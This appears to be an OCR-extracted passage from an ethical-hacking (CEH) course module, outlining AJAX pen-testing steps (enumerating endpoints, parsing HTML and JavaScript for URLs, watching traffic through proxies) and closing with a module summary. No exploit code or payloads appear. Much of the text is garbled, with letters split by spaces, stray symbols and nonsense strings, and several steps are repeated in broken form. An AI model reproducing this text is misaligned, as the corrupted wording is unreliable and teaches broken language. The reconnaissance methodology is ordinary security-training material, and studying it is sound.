fra m e w o r k s
U se a p ro x y to ................. v F o r m a t o f a p p lic a t io n
o b s e rv e t r a ff ic re q u e s ts
8 E n u m e r a t e t h e A J A X c a ll e n d p o in t s f o r t h e a s y n c h r o n o u s c a lls u s in g t o o l s s u c h a s S p r a ja x
ט O b s e r v e H T M L a n d J a v a S c r ip t f i l e s t o f i n d U R L s o f a d d it io n a l a p p lic a t io n s u r f a c e e x p o s u r e
© U s e p r o x i e s a n d s n i f f e r s t o o b s e r v e t r a f f i c g e n e r a t e d b y u s e r - v ie w a b le p a g e s a n d t h e b a c k g r o u n d a s y n c h r o n o u s
t r a f f i c t o t h e A J A X e n d p o in t s in o r d e r t o d e t e r m in e t h e f o r m a t a n d d e s t in a t io n o f t h e r e q u e s t s
A J A X T e s t i n g
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the
background asynchronous traffic to the AJAX endpoints in order to determine the format and
destination of the requests.
M odule Summary U
CEH
rtiffetf itkNjI lUilwt
W i t h in c re a s in g d e p e n d e n c e , w e b a p p lic a t io n s a n d w e b s e rv ic e s a re in c r e a s in g ly b e in g ta r g e te d
b y v a r io u s a tta c k s t h a t re s u lts in h u g e re v e n u e lo s s f o r t h e o r g a n iz a tio n s
It is a ls o o b s e rv e d t h a t m o s t o f t h e v u ln e r a b ilit ie s r e s u lt b e c a u s e o f m is c o n fig u r a t io n a n d n o t
f o llo w in g s ta n d a rd s e c u r ity p ra c tic e s
-----------
M o d u l e S u m m a r y